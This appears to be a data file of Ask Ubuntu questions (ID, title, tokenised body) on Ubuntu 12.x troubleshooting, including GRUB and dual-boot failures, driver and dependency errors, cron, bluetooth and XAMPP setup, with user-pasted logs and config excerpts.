270204	can i upgrade from 12.10 to 13.04 via an iso image ?	i want to upgrade to 13.04 beta , but i do n't want to upgrade through the terminal as i ca n't download 700mb from home , but i can download an iso image from where i go to school . is it possible ? thanks !
270206	can i change lxde default file browser to	i have to use lxde as my de because of the age of my computer/hardware , and i like it a lot , but i also like using nautilus as my file manager ( it appears to have more options ) for basic file browsing . if i can i would like to change my default file manager from pcmanfm to nautilus . i know this is possible , but the things i have seen , nothing seems to work the way i want it to . thanks !
270216	do i boot from a live cd now that i 'm stuck on grub rescue >	i 've read all the details on how to fix getting stuck in grub , but i think i may have wiped out ubuntu and somehow grub is still there . i get : grub rescue > error : unknown file system ls give me : ( hd0 ) ( hd0 , msdos8 ) ( hd0 , msdos7 ) ... . ( hd0 , msdos1 ) i did a full restore of the windows 7 that is on this machine ( acer 512 notebook ) figuring i would just reinstall ubuntu after , but i ca n't get to windows now and i do n't think i have ubuntu . help !
270221	which repository are free software on 12.04	i know restricted and multiverse are not free software , but what about source code and independent ? edit : i 'm referring to free as in freedom .
270222	no grub and ca n't boot into windows 8 after installing ubuntu 12.10	first , i installed windows 8 in my desktop pc . ( not pre-installed ... i did it by myself ) . then i booted the ubuntu dvd in uefi mode ( did the same with windows 8 ) and installed ubuntu 12.10 64bit . everything went perfectly . after rebooting , there 's no grub ! the system took me directly to ubuntu ! i ca n't log into windows 8 . please help ! earlier , i used boot repair and it messd up with my windows efi files . so i was unable to boot windows even after removing ubuntu . i ca n't use boot repair . now this is a new fresh install , please tell me how to boot into both windows 8 and ubuntu ! here is my /etc/defaults/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=1024×768 # grub_gfxpayload_linux=1024×768 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
270227	unity launcher 'background ' will not auto-hide with launcher icons	i recently set my unity launcher bar to auto-hide , and to be transparent , using the compiz configuration tools ( ccsm , in the terminal ) . i did not use 'unsettings ' to do this , as , for whatever reason , it could not render my launcher transparent in the least . while the launcher auto-hides properly , in accordance with my settings , it has left behind a large , colored bar ( the same size as the launcher ) in its place . this bar does not go away at any time , except for when a window is dragged across it , at which point it disappears entirely , around the window , and reappears when the window has left its premise . i am trying to rid myself of this colored bar ; changing the desktop background has not fixed it , and logging out and logging back in has not fixed it either .
270228	user called backup1 ... what is it for ? how to know if it 's not compromised ?	i was checking my /etc/passwd , when i noticed a user called backup1 . what attracted my attention is the number 1 at the end . is it ok ? how can i know if this user is compromised ? im using ubuntu 12.04 thank you edit : this is the /etc/passwd line corresponding to backup1 : backup1 : x:0:1006 : :/home/backup1 : /bin/sh and this is the one of /etc/shadow backup1 : $ 6 $ etip/5u7 $ p7t.gywhi7ocurfbxpmsruw4yfuu.uc0jpbqgycaaf31j91m8fzurwx67du3nuwhx4fv4sr6wngjitmd9wgkb1:15761:0:99999:7 : : : but the user backup ( without the 1 ) , also have apassword on /etc/shadow .
270232	how to solve visual problems with the dash home ?	every time i try to use dash home i get this glitchy visual fireworks display with random colors and text missing . this is the screen-shoot : is this in relation to how my graphics driver is unknown ? other than this visuals for everything else works perfectly fine .
270233	how do you open a .vce file in ubuntu 12.04 ?	i have a .vce file to open . does someone know which app ( s ) is needed to view this file in ubuntu 12.04 ?
270235	dual booting issues , windows 7 and ubuntu 12.10	okay , so i 've been trying to dual boot my computer . i already installed windows 7 , and now i want to install ubuntu , but when i load to the disk , goes the purple screen , i select the language , and then install ubuntu , after this is the problem . it either goes a black screen with flashing cusor for awhile before freezing , or goes the ubuntu loading screen the freezes after awhile . now i 've tried making a new disc and partions , and still have the samething happening . i 've recently built this computer , it has i5 processor , 8gb ram , and a tb hard drive . so if any suggesting would be very helpful , because i 've read every thing my comptia book has to offer , muiltiple thread , and nothing i 've tried has worked .
270237	wubi installer stuck on `` downloading ubunt-12.04.2-wubi-amd64.tar.xz ''	i downloaded and mounted the iso to install the 64 bit wubi , but every time i run it it gets stuck on `` downloading ubuntu-12.04.2-wubi-amd64.tar.xz . i 've seen other people with this problem who never seem to get it solved . i 'm running on a 64-bit windows 7 home premium machine , my internet connection is fine , i 'm just not sure what the problem is or how to fix it . any advice is very appreciated .
270238	show files being accessed most in a short time period	so i 've got a server that 's struggling under the weight of several wordpress installs . things are relatively well cached ( i am planning to improve things anyway ) but i can quickly see that disk io is extremely high . i have used iotop to see that it 's mostly php honking on the disk but i would really like to know which files . i feel that if i knew that , i might be able to spot additional issues or find a bottleneck that could be widened ( move stuff to ram-disk , etc ) . so i 'm looking for a command that will give me a list of open files , ranked by their io over the time since the command began . or something that works on a set period , like 60 seconds . note : i 'm looking for more than lsof â i need the output ranked by total io throughput .
270246	battle for middle-earth and shaiya issues ubuntu 12.10 , thinkpad t520	i have a thinkpad t520 with intel sandy bridge mobile graphics with ubuntu 12.10 and i have trouble running both battle for middle-earth 1 and shaiya . they both install fine . shaiya does n't run at all and bfme 1 has multiple issues although it works . the screen shrinks sometimes in two different ways . i would really like to play shaiya as well and i 'm wondering if it is a graphic driver issue . would anyone know ?
270249	trying to install cinnamon and getting a dependency error	trying to install cinnamon 1.6.4 using apt-get install cinnamon and i 'm getting this error . how can i resolve this error ? cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libgjs0-libmozjs185-1.0 but it is not installable depends : libgjs0c ( > = 1.34.0 ) but 1.32.0-1ubuntu1 is to be installed depends : libgnome-desktop-3-4 ( > = 3.2.0 ) but it is not installable depends : libmuffin0 ( > = 1.1.1 ) but it is not going to be installed recommends : nemo but it is not going to be installed e : unable to correct problems , you have held broken packages .
270251	installing pidgin - package libdrm-nouveau1 can not be removed	when i trying to install pidgin client , the installations paused and an error appeared . it says package libdrm-nouveau1 can not be removed . '' .. can you all help me ?
270254	unable to install .deb on ubuntu software center	i downloaded dropbox .deb from https : //www.dropbox.com/install ? os=lnx and the google voice chat plugin from https : //www.google.com/chat/video but when i click on the .deb files they open in ubuntu software center . and when i click on install , nothing happens . the install button just turns grey . i 'm running 32 bit ubuntu 12.10
270256	access windows file system problem	i 'm using ubuntu 12.10 and its a dual boot.till yesterday i'v access windows through ubuntu.but today when i try to access windows through ubuntu it shows error message . here it is , blockquote error mounting /dev/sda2 at /media/dingo/a2b20c30b20c0b8b : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/dingo/a2b20c30b20c0b8b '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/dingo/a2b20c30b20c0b8b ( for long time i 'm not logged to windows . ) .give me some help . thanks
270264	how do i unlock a microsd card ?	i have a locked microsd ( locked by nokia symbian phone ) , i forgot the password , how do i unlock it ? i do n't mind if i lost my data in microsd . i ca n't mount it . output of mkdir ~/sd_mount & & sudo mount /dev/sdb ~/sd_mount and sudo fdisk -l :
270265	ca n't install g++ in software center	i ca n't install g++ in software center . i can install other programs . for example , after i found g++ ca n't be installed , i installed chrome for test purpose through software center , and it worked ! g++ can be installed in the terminal via apt-get install . only the software center way did n't work . here is the messages display in the terminal when i installed g++ in software center : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? xch @ xch-pc : ~ $ sudo software-center [ sudo ] password for xch : 2013-03-20 13:11:19,232 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none ' 2013-03-20 13:11:19,272 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-03-20 13:11:20,412 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-03-20 13:11:20,893 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-03-20 13:11:20,901 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-03-20 13:12:09,553 - softwarecenter.backend - error - error in_on_trans_finished 'error : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . g++ g++-4.6 libstdc++6-4.6-dev ' 2013-03-20 13:12:11,356 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-03-20 13:12:15,565 - softwarecenter.db.update - info - skipping region restricted app : 'bulleti d'esquerra de calonge i sant antoni ' ( not whitelisted ) 2013-03-20 13:12:16,527 - softwarecenter.db.update - info - skipping region restricted app : 'comentarios web ' ( not whitelisted ) 2013-03-20 13:12:18,910 - softwarecenter.ui.gtk3.app - info - software-center-agent finished with status 0 2013-03-20 13:12:18,911 - softwarecenter.db.database - info - reopen ( ) database 2013-03-20 13:12:18,911 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true ^cg_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting.. who can tell me why this happens ? how can i fix it ? ps : i have had gcc and gdb installed in my 12.04lts before . my goal is to install qt creator via software center , which does n't work either . i finally installed qt creator via synaptic . but i 'm still curious about why it ca n't be done in software center . does software center use some specific website ? i 'm in china and some websites ca n't be accessed because of the so called gfw .
270266	commands in script do not run , but in terminal they do	my script is as follows : # ! /bin/sh rm -rfv /home/user/documents/exercise/* cp -rfv /home/user/documents/exerciseshare/exercisefiles/word/advanced/ /home/tp3/documents/exercise/ if i was to run these commands individually via terminal they run ok . i have put them in a script ( as above ) and when i attempt to tun the script the terminal windows flashes for about a second and nothing happens . my attempts at solutions : adding wait to the end of the script - no luck right click script > properties > permissions > execute - set attempted to run and run in terminal - no luck i am using ubuntu 12.10 64-bit
270267	ubuntu 12.10 graphic driver problem	i 've got singtech lap top , model-w251hp , with nvidia gt520m 1gb graphic . i installed ubuntu 12.10 yesterday and try to update . but i ca n't find nvidia driver in settings/software sources/additional driver/ . so , i typed the following command that i found in some forum : sudo apt-get install nvidia-current nvidia-settings after the reboot , my desktop has gone . no side bar . no keyboard icon or time on top right corner . everything except the desktop background has gone . but , i can still press ctrl+alt+t and can open terminal and type firefox for browser . thanks .
270268	reinstalling ubuntu 11.10	i have ubuntu 11.10 64bit , and due to some installations via terminal , i lost many files in libc , and i ca n't repair , so , i need to reinstall ubuntu 11.10 . please suggest an easy way to get ubuntu 11.10 re-installed .
270272	why are n't my drives fscking	i logged on to my ubuntu server and the message of the day contained these wonderful messages : *** /dev/sda1 will be checked for errors at next reboot *** *** /dev/sda6 will be checked for errors at next reboot *** now , i loves me some healthy file systems so i reboot after doing my thing , but when i next log in , the same messages appear . sure enough , dumpe2fs dutifully informs me that the last check is still way way in the past and the next check date , while not being as far , is not in the future . now , i made sure the system checked everything with a pair of forcefsck files and that got rid of the messages , but i still do n't understand what could cause my server not to run a file system check despite telling me it needs to do one .
270273	strange networking problem . google does not work	google does not work , like just google . this is the weirdest error i have ever seen . every 20-30 minutes google stops working in my browser , any other page works . then in 5-10 minutes , it just comes back . naturally the first thing i do is pull up the terminal and try to ping google.com . it works fine . next , i try a different browser , still nothing . next i try another computer on the same network , it loads google no problem . i tried both wired and wifi , i tried static ip and dynamic ip , nothing works . it seems to have a mind of its own . this is so hard to diagnose because of its intermittent nature . does anyone have any ideas ?
270275	boot-repair stuck at `` reinstall grub ''	i bought a new sony vaio e14p series laptop . it has pre-installed windows 8 , and i want to dual boot it with ubuntu 12.10 64-bit . i have disabled secure boot and installed ubuntu without any problem from live usb . when i reboot after installation , it directly boots to windows 8 and does n't load grub at all . so i went to live usb again to boot-repair . it stuck at the `` reinstall grub '' step . i 've waited for hours but nothing happened . here is my boot info : http : //paste.ubuntu.com/5630288/ there are no fastboot options in bios nad uefi is still enabled ( because windows 8 installed in uefi i guess ) . thanks . : )
270278	how to change ctrl + < keypad key > behavior ?	i often use my keypad keys for navigation . i 'd like to change my keyboard behavior so that , for example , control + ( keypad ) page up functions the same as control + page up . there 's a similar option in keyboard layout - > options - > miscellaneous compatibility options that makes shift + ( keypad ) page up behave the same as shift + page up , but there is no such option for control . how can i do this ?
270279	how to delete files from ubuntu one ?	i 'm using ubuntu 12.10 and i 'm having a ubuntu one account . i synchronize a photo folder with it . synchronizing is ok and my photo of that folder is in that cloud . the thing is now i want to delete some photos of that folder in that cloud but there is no option to delete a photo . how do i remove some photos in the cloud ? thank you .
270280	how do i configure deluge bittorrent client ?	i am unable to use deluge torrent client in 12.04 , i am confused about what setting should i use in preferences . it asks for various proxies - one for each of peer , seed , tracker ... i have used torrents only in windows before and configuring it was as easy as hell . i use internet on a wifi lan . thanks for any help .
270286	download tv sohu	ho do i download these videos in ubuntu ? in windows getflv software was used . i tried many flash video helper like downloadhelper without any luck link
270289	pdf2djvu conversion of all files in a folder	need to convert hundreads of pdf files across several folders . pdf2djvu gui is junk on windows and always crashes after a couple of conversions . taking this code of which i am working from for file in *.pdf ; do pdftotext `` $ file '' `` $ file.txt '' ; done i normally run pdf2djvu like this : pdf2djvu -o *.djvu *.pdf using what 's below gives me : i wo n't write djvu data to terminal for file in *.pdf ; do pdf2djvu `` $ file '' `` $ file.djvu '' ; done and for : file in *.pdf ; do pdf2djvu -o `` $ file '' `` $ file.djvu '' ; done unable to load document pdf error : could n't open file*.pdf.djvu : random unknown characters and for : for file in *.pdf ; do `` pdf2djvu -o '' `` $ file '' `` $ file.djvu '' ; done pdf2djvu -o : command not found and for : for file in .pdf ; do `` pdf2djvu -o *.djvu *.pdf '' `` $ file '' `` $ file.djvu '' ; done bash : pdf2djvu -o *.djvu *.pdf : no such file or directory
270291	crontab does not run	i have added a script to run every min like this crontab -e and then add this code * * * * * /bin/sh /home/user/public/call.sh the code did not run then i restarted the cron sudo /etc/init.d/cron restart and try this too sudo service cron restart but still the code did not work i can use graphical schedule task app but i dont want to use it but use command line the code is just to take screen shot every min # ! /bin/sh now= $ ( date + '' % m_ % d_ % y- % t '' ) import -window root .folder/image $ now.png and file permission is 777 too if i run this script directly it works perfectly but in crontab
270299	live usb does not boot on asrock e350m1	i 've just bought a new computer , with specs : motherboard asrock e350m1 processor amd dual core e-350 graphic card ati radeon hd6310 and tried to install ubuntu 12.10 on it , from a live usb . i 'm never able to get to the install screen , i keep getting error messages like : udev [ 110 ] : timeout killing /sbin/modprobe -bv pci : [ characters ] udev [ 110 ] : timeout killing /sbin/modprobe -bv pci : [ characters ] udev [ 110 ] : timeout killing /sbin/modprobe -bv pci : [ characters ] ... reading this , it 's possible that i would need to install amd drivers but how am i supposed to do that if i ca n't even boot ? should i install them on the live usb before trying to boot ? or is it another problem ? edit : i 've seen someone solved this problem by selecting `` os select : other '' instead of `` os select : windows '' in the bios , but the problem is i do n't have a bios , i have the asrock uefi ... and this option is not present in asrock uefi .
270302	evolution unread message count on messaging menu	i remember in earlier versions of ubuntu , i used be able to see the evolution unread messages count under the messaging menu along with the unread twitter and unread instance messages . it seems to have gone . evolution seems to work fine , i have tried configuring it from scratch again but nothing shows on the menu . where should i check to see if something is not configured correctly ? ( incidentally i do get calendar alerts showing as a clock )
270312	disable hdmi sound out , for decrease power consumption	i have ubuntu 12.04 on my laptop i 'm looking for a way to decrease power consumption . this is output of powertop command power est . usage events/s category description 1.30 w 100.0 % device audio codec hwc0d0 : realtek i googled a little and find this 100.0 % usage related to digital output through hdmi port . i 'm looking for a way to disable digital output or hdmi pot , i do n't use this port anyway . also i want to have sound . i put some sound module in /etc/modprobe.d/blacklist.conf blacklist snd_hda_codec_realtek blacklist snd_hda_intel blacklist snd_hda_codec problem solved , but there is not any sound . any idea appreciated in advance . edited : more illustration about the problem output of 'aplay -l ' is **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc269vb digital [ alc269vb digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've wanted to turn off digital device , because i thinked it is source of power consumption , according to powertop 's output . here , what i did . added following line at the end of /etc/modprobe.d/blacklist.conf blacklist snd_hda_codec_realtek after restart , output of aplay -l is : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and output of lsmod | grep snd is snd_hda_intel 32765 3 snd_hda_codec 109562 1 snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 3 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62218 13 snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm unfortunately output of powertop shows no change powertop : in device stats power est . usage device name 1.26 w 100.0 % audio codec hwc0d0 : realtek also in this situation i have not any sound ! again , i 'm looking forward to see your opinion , idea .
270315	dependency problem 2	hello i 'm kiran i 'm using ubuntu 12.04 and is pretty nice but my problem is that i do n't have any internet connection and i 'm using ubuntu on my desktop i want to use wine , ms office , turbo c++ , dos box , and many more applications that are required to me but for installing these things ubuntu need 's dependencies so is there any package to install all the dependencies that are required for ubuntu . and one more thing i 'm not gon na use windows anymore ubuntu will be the only one for me ...
270319	bluetooth suddenly stopped working	i booted up my computer yesterday and found i could n't discover new bluetooth devices.. it works fine when booting into windows , so i know my radio did n't die . i 'm using a vizio ct15-a5 laptop ... here are some outputs for you : funkdified @ vizio ~ $ sudo bluetoothd -d -n bluetoothd [ 2603 ] : bluetooth daemon 4.101 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 2603 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 2603 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 2603 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' d-bus setup failed : name already in use bluetoothd [ 2603 ] : unable to get on d-bus code : blueman-browse loading configuration plugins _________ setadapter ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:301 ) none _________ on_property_changed ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:180 ) adapter propery changed discovering 1 _________ on_property_changed ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:180 ) adapter propery changed discovering 0 _________ on_property_changed ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:180 ) adapter propery changed discovering 1 _________ destroy ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:128 ) destroying _________ __del__ ( /usr/lib/python2.7/dist-packages/blueman/gui/deviceselectorwidget.py:81 ) deleting widget _________ __del__ ( /usr/lib/python2.7/dist-packages/blueman/gui/devicelist.py:63 ) deleting mainlist code : funkdified @ vizio ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : no hard blocked : no any help would be greatly appreciated . not sure how it just died suddenly ! kernel = 3.5.0-17-generic ubuntu = 12.10 64 bit version
270323	ubuntu installer can not see windows os partition and sees my hard drive as blank ?	good day , i have just downloaded ubuntu 12.10 today using windows 7 and installed it to my sd card . i booted up using the sdcard , and everything was going perfectly well until ubuntu said i currently have no operating systems . so instead , i tried the 'something else ' option , but it said that my hard drive is blank . please help .
270324	unable to install libc6 specific dependencies	i am unable to install libc6 specific dependencies in ubuntu 11.10. sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libc-bin libc6 suggested packages : glibc-doc the following new packages will be installed : libc-bin the following packages will be upgraded : libc6 1 upgraded , 1 newly installed , 0 to remove and 479 not upgraded . 2 not fully installed or removed . need to get 0 b/5,296 kb of archives . after this operation , 3,273 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) how do i fix this issue ?
270325	logitech touchpad t650 does not click	i have just received this logitech touchpad t650 . the problem is that on my ubuntu 12.10 desktop , the left or right tap clicks do n't work while i can navigate and scroll with the touchpad . any ideas to fix this ? thanks
270326	lxc : can i guarantee a certain level of cpu resources to a given container	we 're going to use lxc to multi-purpose our hardware while keeping the various applications easy to manage , develop , upgrade , and logically segregated . what i want to know is if i can guarantee certain resources , such as cpu , to a certain container . we have one process which will run in its own container that is a critical component of our application infrastructure . i 'd like to dual purpose that box and let a non-critical , but resource-intensive , component ( the worker node ) reside in a separate container on the same hardware , but to be safe i want to guarantee that , when the critical component needs cpu , it gets it , at the expense of the non critical component . i 'd rather do this at the container level rather than jury-rigging the application with nice or something like that because this configuration is only valid on one piece of hardware , on other boxes the worker node stands alone .
270328	can not print pdf pages with images	when i try to print a pdf file that contains images , the printing stops just before the first page that contains an image . if the first page contains an image , only a single blank page is printed . i saw that there is an old bug report , relating to ubuntu 11 : https : //bugs.launchpad.net/ubuntu/+source/cups-pdf/+bug/836278 however , i have 12.04 , and i updated cups-pdf , and i still get this error .
270335	ubuntu touch extracting binary blob files	i 'm trying to port ubuntu touch for the i9001i ( s plus ) and i need the binary blob files from the cyanogenmod . is there a way to get these files without flashing a cyanogenmod rom to my s plus device ?
270336	mousepad not working with 12.04	i am running 12.04 64-bit , and i have had a bit of trouble with ubuntu . first , i installed 12.10 32-bit , and then i tried to install 64-bit , but it did n't work . then , one of my friends , who has the exact same computer as i do , said that he installed 12.04 lts 64-bit , and it ran perfectly . so i tried doing that , and then upgrading to 12.10 from the terminal , however that did n't work either . then i decided to run 12.04 , because it was 64-bit , but once i installed it , i had to update a couple of things ( 85 to be exact ) and i also updated a driver . i rebooted my computer , because you have to do that after you update something , and then the mousepad stopped working . i can click the buttons , but i ca n't move it . when i was running windows 7 , and when i was running 12.10 32-bit , it worked fine , and i do n't know what to do . it has to be said , that i am a complete ubuntu novice , and i do n't really know what to do . here are my specs : - packard bell easynote lm series - 640 gb hdd - 6 gb ddr3 ram - amd phenom ii x2 n660
270339	update path variable during script execution	i am writing a script that installs a program . the problem is the program needs to have path variables set to install . how do i set path variables during the script execution and update the shell so the installation can finish with one sweep ?
270340	how do i get the plasmoid repository	i had a load of plasmoids , beginning with plasma-widget- and kde-applet and kde-plasmoid- , which i think i had added from a ppa , but i ca n't for the life of me find which one it is ( i did a fresh install ) . i have already tried the backports ( first ppa i added anyway ) , but it is n't the one .
270341	how to auto hide the panel on the left ? ( unity )	in ubuntu there is panel on the left , unity . one can easily change settings so that it hides automatically and appears only if the mouse cursor hits the left border of the screen ( this is what i did ) . today , i pressed some button accidentally and the panel appears again and stays there . the main problem is that it covers the left parts of all my applications ( for example terminal , so i can not type in my terminal if it is maximized ) . i tried to change the behaviour in settings ( the same window where i changed the background of the screen , but it has no effect ) . does anybody know how i can resolve this problem ?
270344	how to associate file types with wine in nautilus	i have ubuntu 12.10 with nautilus 3.4.2 . after installing wine `` apt-get install wine '' are exe files still associated with the archive manager . in previous versions of ubuntu i 've always right clicked on the file , choose properties > open with > select an application to open ... > wine . but since version 12.04 wine in programs menu is missing . i tried it on a laptop and pc , version 12.04 and 12.10 . i found a workaround : http : //vazhavandan.blogspot.cz/2012/12/nautilus-342-open-as-administrator-hack.html but i wanted to find a correct solution , im installing ubuntu to users , and i 'd like at everything works as it should . thx
270345	how to make unity set window properties ( sticky , on top ) to some windows ( google talk )	i have ubuntu 12.04 and i would like to the default window manager to help me setting `` always on top '' and `` always on visible workspace '' properties to some windows . ideally matching the title with some regular expressions . i would like to keep the window manager , ( i know there are others ) , since i am used to it , i like for most of the things and i configured some settings to my tastes .
270346	spell check and locale	i have too many languages in my spell checker and i would like to clean up . when i say spell checker , i mean the spell checker in firefox , but also other applications like tomboy . the thing is , i have a few language packs installed , which is what i want . i use english as my system language , but i want an ( austrian ) german number format and spell check . i 'd also like to keep my hebrew spell checker . what 's more annoying is , that a lot of `` regional '' dicts were installed . so i have now 9 entries ( and i got rid of some already ) . i do n't mind having german and german ( austria ) , but i 'd like to get rid of german ( belgium ) and german ( luxemburg ) . in system settings - > language support , i have installed english , german and hebrew . apparently that installed also the local variations , because after wiping some myspell/aspell/hunspell dicts off my system , it prompts me that the language support is not complete and if i want to install myspell-en-za and myspell-en-au . but no thanks . as you can see , i did find some of the packages for local language variants , but not for the others ! aptitude search `` ~ispell '' gives : i aspell - gnu aspell spell-checker i aspell-en - english dictionary for gnu aspell i hunspell-de-at - austrian ( german ) dictionary for hunspell i hunspell-de-de - german dictionary for hunspell i hunspell-en-us - english_american dictionary for hunspell i libaspell15 - gnu aspell spell-checker runtime library i libgtkspell-3-0 - spell-checking addon for gtk 's textview wi i a libgtkspell0 - a spell-checking addon for gtk 's textview i libhunspell-1.3-0 - spell checker and morphological analyzer ( i myspell-en-gb - english_british dictionary for myspell i myspell-he - hebrew dictionary for myspell searching for `` dict '' only gives me `` dictionaries-common '' , hyphenation is installed for en and de , searches for `` thes '' ( aurus ) etc . also do n't give me de-be or similar . aptitude search `` ~ilang '' gives : i language-pack-de - translation updates for language german i language-pack-de-base - translations for language german i language-pack-en - translation updates for language english i language-pack-en-base - translations for language english i language-pack-gnome-de - gnome translation updates for language ger i language-pack-gnome-de-base - gnome translations for language german i language-pack-gnome-en - gnome translation updates for language eng i language-pack-gnome-en-base - gnome translations for language english i language-pack-gnome-he - gnome translation updates for language heb i a language-pack-gnome-he-base - gnome translations for language hebrew i language-pack-he - translation updates for language hebrew i a language-pack-he-base - translations for language hebrew i language-selector-common - language selector for ubuntu i language-selector-gnome - language selector for ubuntu i libslang2 - s-lang programming library - runtime versi i a libslang2 : i386 - s-lang programming library - runtime versi i do n't have any other languages or dictionary ( extensions ) installed in firefox ( or deactivated them ) and these languages also appear in tomboy . any ideas how to get rid of 'em ?
270354	ubuntu 12.10 - `` the system network services are not compatible with this version ''	fairly new to ubuntu , know my way around , but novice user . started my laptop running ubuntu 12.10 this morning , and no wireless or eth . look at network manager and this message : `` the system network services are not compatible with this version '' running fine last night , installed and used tftpd-hpa no problem and then i shut down normally and restarted this morning . nothing unusual , there may have been some updates yesterday , not certain . restarted services , rebooted , checked all usual . any ideas please thanks .
270357	how to create a web browser only session	i was recently in a virgin media shop and was interested to see that they had laptops running ubuntu for customers to browse the web on . the setup itself was interesting and i 'm wondering if anyone knows how to recreate it . the features were : only running firefox , no other panels or menus i tried running a terminal ( ctrl+alt+t ) but it gave a message saying the user did n't have permission to access the x server ( or something similar ) i realise to recreate this is a function of controlling both user privileges and session parameters but i 'm not sure how i would go about it . any ideas ?
270359	ubuntu 12.10 wireless internet works but wired internet with ethernet does n't	i 've recently installed ubuntu 12.10 as a dual boot with windows 7 but i 've found my that neither operating systems can detect any of my ethernet cables . wireless internet does work on both though . my lan driver is realtek pcie gbe family controller . since i 'm new to ubuntu i have n't tried much to fix it on ubuntu , but i 've tried a variety of things on windows like re installing the driver . any advice will be appreciated .
270361	xampp not able to run php files	i have installed xampp server properly in ubuntu 12.10. also changed permissions of htdocs folder where my php files are stored , but when i run my project these files are not accessed . i am using xampp for running my android application . i am connecting xampp to my android application . php files contains database queries . url of these files are stated in my code as 10.0.2.2/file_name . but when i run my code these files are not accessed . same code is running easily in windows but i think may file permission is creating problem in ubuntu . i followed instructions provided by link forums.bizhat.com/linux-freebsd-opensource/âś but still querries in php files does n't run . can anyone please help . sample project link is http : //www.androidhive.info/2012/05/how-to-connect-android-with-php-mysql/ when i run this project i get `` json parser error '' . it is because my code is not able to reach database querries which are written in php files ( saved in htdocs of xampp ) . same code is running properly in windows but i want it to run in ubuntu . so is there any way to do so ? ? ? how can i make my php files get accessed ? ? thanks in advance..
